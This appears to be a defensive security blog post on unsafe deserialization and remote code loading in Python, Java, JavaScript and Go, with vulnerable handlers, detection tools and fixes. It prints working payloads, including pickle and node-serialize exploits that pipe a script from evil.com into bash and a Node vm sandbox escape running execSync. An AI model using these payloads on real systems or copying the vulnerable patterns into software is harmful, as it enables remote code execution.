Integrity failures happen when an application trusts data or code that hasn’t been verified, and they can lead to some of the most devastating compromises out there. OWASP A08 covers two patterns I find particularly fascinating: unsafe deserialization (CWE-502), where untrusted data is fed into a deserializer that can execute arbitrary code, and inclusion of functionality from untrusted sources (CWE-829), where the application loads and runs code from URLs, plugins, or scripts without integrity checks. Both patterns share a root cause: the application assumes that incoming data or code is benign. In this post I’ll walk through Python, Java, JavaScript, and Go, from the textbook pickle.loads() to the subtle VM sandbox escapes that can survive expert review.

Why Deserialization Is So Dangerous

Serialization converts objects into a byte stream. Deserialization converts them back. The problem is that many serialization formats encode not just data but behaviour: class names, method references, constructor calls. When a deserializer processes untrusted input, it can instantiate arbitrary objects, call arbitrary methods, and execute arbitrary code. I think of deserialization as handing someone a loaded gun and asking them to describe it: the damage happens before you get a chance to inspect anything.
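
A quick way to see that a pickle stream encodes behaviour, not just state, is the standard-library pickletools disassembler. The Greeter class here is just an illustration of a __reduce__ payload, deliberately benign:

```python
import pickle
import pickletools

class Greeter:
    def __reduce__(self):
        # Benign stand-in for an attacker's payload: name a callable plus args.
        return (print, ("hello from __reduce__",))

# The disassembly shows a *_GLOBAL opcode naming the callable and a REDUCE
# opcode instructing the unpickler to call it. That's behaviour, not data.
pickletools.dis(pickle.dumps(Greeter()))
```

The REDUCE opcode in the output is the exact mechanism every pickle exploit in this post rides on.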

The danger varies by language, and understanding the differences is important:

  • Python: pickle.loads() can execute arbitrary code via the __reduce__ method. There is no safe way to unpickle untrusted data without a restricted unpickler. This is the one I flag most often in code reviews.
  • Java: ObjectInputStream.readObject() instantiates classes from the classpath. With gadget chains (e.g., Apache Commons Collections), this leads to remote code execution.
  • JavaScript: The node-serialize library evaluates function expressions during deserialization via the _$ND_FUNC$_ pattern.
  • Go: encoding/gob is safer than the others; it doesn’t execute arbitrary code, but it can still cause denial of service through crafted payloads and unexpected type instantiation.

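The “restricted unpickler” mentioned in the Python bullet is worth seeing once. This is a minimal sketch, with an illustrative allowlist, that subclasses pickle.Unpickler and vetoes every global lookup:

```python
import builtins
import io
import pickle

# Illustrative allowlist: expand deliberately, never by default.
SAFE_BUILTINS = {"dict", "list", "tuple", "set", "str", "int", "float", "bool"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only plain built-in containers and scalars may be resolved;
        # anything else (os.system, subprocess.Popen, ...) is refused.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"forbidden global: {module}.{name}")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Even this only narrows the attack surface; for genuinely untrusted input the real answer remains a data-only format like JSON.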
CWE-829 extends the threat beyond deserialization: loading code from remote URLs, evaluating user-supplied scripts, or importing untrusted plugins all violate software integrity. These patterns show up in real codebases more often than you’d expect.

The Easy-to-Spot Version

Python: pickle.loads() on User Input

import base64, json, pickle, yaml
from flask import Flask, request, jsonify

app = Flask(__name__)

@app.route("/api/workflows/import", methods=["POST"])
def import_workflow():
    data = request.get_json()
    fmt = data.get("format", "json")
    payload = data.get("payload", "")
    raw_bytes = base64.b64decode(payload)

    if fmt == "pickle":
        workflow_data = pickle.loads(raw_bytes)
    elif fmt == "yaml":
        workflow_data = yaml.load(raw_bytes.decode("utf-8"), Loader=yaml.Loader)
    else:
        workflow_data = json.loads(raw_bytes.decode("utf-8"))

    # ... store workflow ...
    return jsonify({"message": "Workflow imported"})

pickle.loads(raw_bytes) on user-supplied data is the textbook deserialization vulnerability. An attacker crafts a pickle payload using the __reduce__ method:

import pickle, base64, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl http://evil.com/shell.sh | bash",))

payload = base64.b64encode(pickle.dumps(Exploit())).decode()
# Send: {"format": "pickle", "payload": payload}

When the server calls pickle.loads(), the __reduce__ method fires, executing the shell command. Every SAST tool with Python support flags pickle.loads on untrusted input. This still shows up in production code, usually in internal tools where someone thought “only our team uses this endpoint.”

The YAML path is also vulnerable: yaml.Loader (the unsafe full loader) can instantiate arbitrary Python objects via tags like !!python/object/apply:os.system.
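
A quick way to see the difference between the loaders: SafeLoader refuses the python-object tags outright. This sketch uses a harmless os.getcwd tag as a stand-in for os.system:

```python
import yaml

doc = "!!python/object/apply:os.getcwd []"

# yaml.load(doc, Loader=yaml.Loader) would import os and call getcwd()
# while parsing; safe_load refuses to construct the tag at all.
try:
    yaml.safe_load(doc)
    print("constructed (unexpected)")
except yaml.YAMLError:
    print("rejected by SafeLoader")
```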

Java: ObjectInputStream.readObject()

@PostMapping("/api/pipelines/import")
public ResponseEntity<?> importPipeline(@RequestBody Map<String, String> body) {
    String payload = body.getOrDefault("payload", "");
    byte[] decoded = Base64.getDecoder().decode(payload);

    try {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(decoded));
        Object pipelineData = ois.readObject();
        // ... store pipeline ...
        return ResponseEntity.ok(Map.of("message", "Pipeline imported"));
    } catch (Exception e) {
        return ResponseEntity.status(400).body(Map.of("error", "Import failed"));
    }
}

Java’s ObjectInputStream.readObject() on user-supplied data is the direct equivalent of pickle.loads(). An attacker uses tools like ysoserial to generate serialized payloads that exploit gadget chains in common libraries (Apache Commons Collections, Spring Framework, etc.). When readObject() processes the payload, the gadget chain executes, running arbitrary commands on the server. Reading through the ysoserial documentation, it’s remarkable how effective these gadget chains are; the hardest part is figuring out which one matches the target’s classpath.

JavaScript: node-serialize Deserialization

const serialize = require('node-serialize');

app.post('/api/jobs/import', (req, res) => {
    const payload = req.body.payload || '';
    const decoded = Buffer.from(payload, 'base64').toString();
    const jobData = serialize.deserialize(decoded);
    // ... store job ...
    return res.json({ message: "Job imported" });
});

The node-serialize library evaluates function expressions during deserialization. An attacker sends a payload containing:

{"rce":"_$ND_FUNC$_function(){require('child_process').exec('curl http://evil.com/shell.sh | bash')}()"}

The _$ND_FUNC$_ prefix tells the deserializer to evaluate the function. The IIFE () at the end executes it immediately. The node-serialize library itself is flagged as vulnerable in npm audit databases. If node-serialize shows up in a package.json, that’s an instant finding: there’s no safe way to use it with untrusted input.

The Hard-to-Spot Version

Python: Deserialization Split Across Store and Retrieve

import base64, pickle, time
from flask import Flask, request, jsonify

app = Flask(__name__)
CACHE = {}

@app.route("/api/cache/store", methods=["POST"])
def cache_store():
    data = request.get_json()
    key = data.get("key", "")
    value = data.get("value")
    serialized = base64.b64encode(pickle.dumps(value)).decode()
    CACHE[key] = {"data": serialized, "stored_at": time.time()}
    return jsonify({"message": "Cached", "key": key})

@app.route("/api/cache/<key>", methods=["GET"])
def cache_get(key):
    entry = CACHE.get(key)
    if not entry:
        return jsonify({"error": "Not found"}), 404
    raw = base64.b64decode(entry["data"])
    value = pickle.loads(raw)
    return jsonify({"key": key, "value": value})

The vulnerability is split across two endpoints, and this is the kind of pattern that makes security review genuinely interesting. The store endpoint serializes with pickle.dumps(), which seems safe because the application controls the serialization, and the JSON-derived values it pickles are benign on their own. But the retrieve endpoint blindly trusts whatever base64-encoded pickle bytes are in the cache, so anything that can write raw bytes into that store (a shared Redis or memcached backend, another service with cache access, a restore from an untrusted backup) can plant a crafted pickle payload. When any user retrieves that key, pickle.loads() executes the embedded code.

A reviewer looking at the retrieve endpoint alone might think “this is just loading data we serialized ourselves.” The key insight, and the one that really clicked for me when I was working through this, is that “we serialized it” is only as strong as the guarantee that nothing else can ever write to the cache; the retrieve path has no way to tell server-produced pickle bytes from attacker-supplied ones.
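
If the cached values genuinely must stay pickled (JSON remains the better fix), the retrieve path can at least refuse bytes the server didn’t produce by authenticating each blob with an HMAC under a server-side key. A sketch with hypothetical helper names and key handling elided:

```python
import hashlib
import hmac
import pickle

SECRET_KEY = b"rotate-me-server-side"  # hypothetical; real key management elided

def dumps_signed(obj) -> bytes:
    """Pickle obj and prepend a SHA-256 HMAC over the pickle bytes."""
    raw = pickle.dumps(obj)
    return hmac.new(SECRET_KEY, raw, hashlib.sha256).digest() + raw

def loads_verified(blob: bytes):
    """Refuse to unpickle unless the HMAC proves we produced the bytes."""
    tag, raw = blob[:32], blob[32:]
    expected = hmac.new(SECRET_KEY, raw, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("integrity check failed: refusing to unpickle")
    return pickle.loads(raw)
```

This narrows the trusted surface to holders of the key; it does not make pickle safe, it just makes “only we wrote this” a checked property instead of an assumption.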

Java: Object Store with Deferred Deserialization

@PostMapping("/api/objects/store")
public ResponseEntity<?> storeObject(@RequestBody Map<String, String> body) {
    String key = body.getOrDefault("key", "");
    String data = body.getOrDefault("data", "");
    byte[] decoded = Base64.getDecoder().decode(data);
    objectStore.put(key, decoded);
    return ResponseEntity.ok(Map.of("message", "Stored"));
}

@GetMapping("/api/objects/{key}")
public ResponseEntity<?> getObject(@PathVariable String key) {
    byte[] data = objectStore.get(key);
    if (data == null) {
        return ResponseEntity.status(404).body(Map.of("error", "Not found"));
    }
    try {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
        Object obj = ois.readObject();
        return ResponseEntity.ok(Map.of("key", key, "data", obj.toString()));
    } catch (Exception e) {
        return ResponseEntity.status(400).body(Map.of("error", "Deserialization failed"));
    }
}

Same pattern as the Python cache example. The store endpoint accepts raw base64 bytes without validation. The retrieve endpoint deserializes them with ObjectInputStream. An attacker stores a ysoserial payload under a known key, and the next user who retrieves it triggers code execution.

SAST tools need interprocedural analysis across two separate request handlers to detect this, tracing from the store endpoint through the in-memory map to the retrieve endpoint. Most tools don’t connect these dots, which is why manually tracing the data flow for serialization patterns is so important.

JavaScript: VM Sandbox Escape

const vm = require('vm');

app.post('/api/templates/:id/render', (req, res) => {
    const template = templates[req.params.id];
    if (!template) return res.status(404).json({ error: "Template not found" });

    const variables = req.body.variables || {};
    const context = vm.createContext({ ...variables });
    const script = `\`${template.body}\``;
    const rendered = vm.runInContext(script, context);
    return res.json({ rendered });
});

This looks safe: vm.createContext() creates an isolated context, and the template is rendered inside it. But Node.js vm contexts are not true sandboxes, and this is something I wish more JavaScript developers knew about. An attacker creates a template with this body:

${this.constructor.constructor('return process')().mainModule.require('child_process').execSync('id')}

The code escapes the VM context by traversing the constructor chain to access the global process object, then uses require to execute system commands. This is a well-known Node.js VM escape technique, but it’s genuinely hard to spot in code review because vm.createContext() looks like it provides isolation. The API name is misleading; I’ve read accounts of senior developers getting fooled by this, and it’s easy to see why.

Go: Gob Deserialization (Safer but Not Safe)

func handleImportPipeline(c *gin.Context) {
    var body struct {
        Format  string `json:"format"`
        Payload string `json:"payload"`
    }
    c.ShouldBindJSON(&body)

    decoded, _ := base64.StdEncoding.DecodeString(body.Payload)

    if body.Format == "gob" {
        var pipelineData map[string]interface{}
        decoder := gob.NewDecoder(bytes.NewReader(decoded))
        if err := decoder.Decode(&pipelineData); err != nil {
            c.JSON(400, gin.H{"error": "Gob decode failed"})
            return
        }
        // ... store pipeline ...
    }
}

Go’s encoding/gob is fundamentally safer than pickle or Java serialization: it doesn’t execute arbitrary code during deserialization. But it can still be exploited for denial of service through crafted payloads with deeply nested structures or extremely large collections that consume excessive memory. Because the handler decodes into map[string]interface{} (and, transitively, []interface{}), an attacker can construct arbitrarily complex object graphs. Go deserves credit here: the language’s design makes the worst-case scenario a DoS rather than RCE, which is a meaningful improvement.

CWE-829: Remote Code Loading

The most dangerous integrity failures involve loading and executing code from untrusted sources. These are the findings that keep security researchers up at night.

Python: Fetching and Executing Remote Code

import urllib.request
from flask import Flask, request, jsonify

app = Flask(__name__)

@app.route("/api/extensions/load", methods=["POST"])
def load_extension():
    data = request.get_json()
    url = data.get("url", "")

    response = urllib.request.urlopen(url)
    code = response.read().decode("utf-8")
    module_ns = {}
    exec(compile(code, url, "exec"), module_ns)

    return jsonify({"message": "Extension loaded", "exports": list(module_ns.keys())})

The endpoint fetches Python code from a user-supplied URL and executes it with exec(). An attacker points the URL to a malicious script, and the server downloads and runs it with full process privileges. This pattern shows up in “plugin” systems where the developer wanted extensibility without thinking through the security implications.

Java: URLClassLoader with Remote JARs

@PostMapping("/api/extensions/load")
public ResponseEntity<?> loadExtension(@RequestBody Map<String, String> body) {
    String jarUrl = body.getOrDefault("jar_url", "");
    String className = body.getOrDefault("class_name", "");

    URL url = new URL(jarUrl);
    URLClassLoader loader = new URLClassLoader(new URL[]{url}, getClass().getClassLoader());
    Class<?> clazz = loader.loadClass(className);
    Object instance = clazz.getDeclaredConstructor().newInstance();

    return ResponseEntity.ok(Map.of("message", "Extension loaded", "class", className));
}

URLClassLoader with a user-supplied JAR URL loads and instantiates arbitrary Java classes. The class constructor and any static initializers execute immediately. An attacker hosts a malicious JAR and achieves remote code execution. This pattern appears in enterprise applications that support “custom integrations”; the feature request sounds reasonable until you realise it’s arbitrary code execution as a service.

JavaScript: Remote Hook Registration

const http = require('http');
const vm = require('vm');

app.post('/api/hooks/register', (req, res) => {
    const hookUrl = req.body.url;

    http.get(hookUrl, (response) => {
        let code = '';
        response.on('data', chunk => code += chunk);
        response.on('end', () => {
            const wrappedCode = `(function(require, console) { ${code} })`;
            const script = new vm.Script(wrappedCode);
            const context = vm.createContext({ require, console });
            const hookFn = script.runInContext(context);
            hookFn(require, console);
            res.json({ message: "Hook registered" });
        });
    });
});

The endpoint fetches JavaScript from a remote URL and executes it in a VM context that includes require and console. The require function gives the fetched code full access to Node.js APIs: filesystem, network, child processes. The VM context provides zero isolation because require is passed in. Passing require into a VM context is basically handing over the keys to the kingdom; that’s an immediate red flag in any review.

Go: Remote Plugin Loading

func handleLoadPlugin(c *gin.Context) {
    var body struct {
        Name string `json:"name"`
        URL  string `json:"url"`
    }
    c.ShouldBindJSON(&body)

    resp, _ := http.Get(body.URL)
    data, _ := io.ReadAll(resp.Body)

    pluginPath := filepath.Join("/tmp/plugins", body.Name+".so")
    os.WriteFile(pluginPath, data, 0755)

    p, err := plugin.Open(pluginPath)
    if err != nil {
        c.JSON(400, gin.H{"error": "Plugin load failed"})
        return
    }

    initFn, err := p.Lookup("Init")
    if err == nil {
        initFn.(func())()
    }

    c.JSON(200, gin.H{"message": "Plugin loaded"})
}

Go’s plugin.Open() loads a shared object file and executes its init() functions. An attacker hosts a malicious .so file, and the server downloads, saves, and loads it, executing arbitrary native code. This is about as bad as it gets. This pattern is rare, but when it shows up, it’s always a critical finding.

Detection Strategies

SAST Tool Coverage

Pattern                        Bandit (Python)   SpotBugs (Java)   NodeJsScan (JS)   gosec (Go)
pickle.loads                   Yes               N/A               N/A               N/A
yaml.Loader                    Yes               N/A               N/A               N/A
ObjectInputStream.readObject   N/A               Yes               N/A               N/A
node-serialize                 N/A               N/A               Yes               N/A
vm.runInContext escape         N/A               N/A               Limited           N/A
URLClassLoader                 N/A               Partial           N/A               N/A
exec() with remote code        Yes               N/A               N/A               N/A
gob.Decode                     N/A               N/A               N/A               Limited
plugin.Open                    N/A               N/A               N/A               No

SAST tools catch the obvious deserialization patterns but struggle with the things that are most interesting from a security perspective:

  • Split store/retrieve patterns (interprocedural analysis required)
  • VM sandbox escapes (requires understanding of Node.js VM internals)
  • Remote code loading via class loaders, plugins, or import mechanisms
  • Go-specific patterns (gob, plugin package)

Manual Review Strategy

Here’s the approach I’ve found most effective when reviewing for integrity failures:

  1. Search for deserialization APIs: pickle.loads, yaml.load (without SafeLoader), ObjectInputStream.readObject, serialize.deserialize, gob.Decode. Trace every call to its data source.
  2. Check for remote code loading: exec() with network-sourced data, URLClassLoader with user URLs, require() with user paths, plugin.Open() with downloaded files.
  3. Audit VM/sandbox usage: Node.js vm module is not a security boundary. Check if the context includes require, process, or other dangerous globals.
  4. Trace store-then-retrieve patterns: When serialized data is stored and later deserialized, verify that the store endpoint validates input and that the serialized format cannot encode executable behaviour. This is where I spend the most time during reviews.
  5. Look for integrity verification: Any code or data loaded from external sources should have hash verification, signature checking, or allowlist validation.
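
Step 1 of that checklist is easy to script. Here’s a throwaway sketch that greps a source tree for the deserialization sinks listed above; the regexes are illustrative, not exhaustive:

```python
import re
from pathlib import Path

# Illustrative sink patterns from the checklist; tune per codebase.
SINK_PATTERNS = [
    r"pickle\.loads?\(",
    r"yaml\.load\((?!.*SafeLoader)",
    r"\.readObject\(",
    r"serialize\.deserialize\(",
    r"gob\.NewDecoder\(",
    r"plugin\.Open\(",
]

SINK_RE = re.compile("|".join(SINK_PATTERNS))
EXTENSIONS = {".py", ".java", ".js", ".go"}

def scan(root: str):
    """Return (path, line number, line) for every line matching a sink pattern."""
    hits = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix not in EXTENSIONS:
            continue
        for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
            if SINK_RE.search(line):
                hits.append((str(path), lineno, line.strip()))
    return hits
```

The output is only a worklist: every hit still needs its data source traced by hand, which is exactly where the split store/retrieve patterns hide.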

Remediation

Use Safe Deserialization

# Python, use JSON, never pickle for untrusted data
workflow_data = json.loads(raw_bytes.decode("utf-8"))

# If YAML is needed, always use SafeLoader
config = yaml.safe_load(yaml_string)

// Java, use Jackson instead of ObjectInputStream
ObjectMapper mapper = new ObjectMapper();
Map<String, Object> data = mapper.readValue(decoded, new TypeReference<>() {});

// JavaScript, use JSON.parse, never node-serialize
const jobData = JSON.parse(decoded);

// Go, prefer JSON over gob for untrusted input
var data map[string]interface{}
if err := json.Unmarshal(decoded, &data); err != nil {
    c.JSON(400, gin.H{"error": "Invalid JSON"})
    return
}

Never Execute Remote Code Without Verification

# Python, use a trusted registry with hash verification
import hashlib
import urllib.request

TRUSTED_EXTENSIONS = {
    "analytics": {"url": "https://internal.repo/analytics.py", "sha256": "abc123..."},
}

def load_extension(name):
    ext = TRUSTED_EXTENSIONS.get(name)
    if not ext:
        raise ValueError("Unknown extension")
    code = urllib.request.urlopen(ext["url"]).read()
    if hashlib.sha256(code).hexdigest() != ext["sha256"]:
        raise ValueError("Integrity check failed")
    return code  # only code that passes the hash check ever reaches exec()

// Java, never use URLClassLoader with user-supplied URLs
// Use a predefined extension registry instead

Use Proper Sandboxing for Template Rendering

// JavaScript, don't use vm module for untrusted code
// Use Handlebars or another template engine with auto-escaping
const Handlebars = require('handlebars');
const template = Handlebars.compile(templateBody);
const rendered = template(variables);

Here’s the core principle that keeps coming back in this research: never trust data or code from outside your application boundary. Deserialization should use formats that cannot encode behaviour (JSON, not pickle). Code should only be loaded from verified, trusted sources with integrity checks. And any “sandbox” that isn’t a true process-level isolation boundary (like Node.js vm) should be treated as no sandbox at all. A deserialization RCE is one of those findings that makes everyone in the room go quiet, and understanding why helps you prevent it.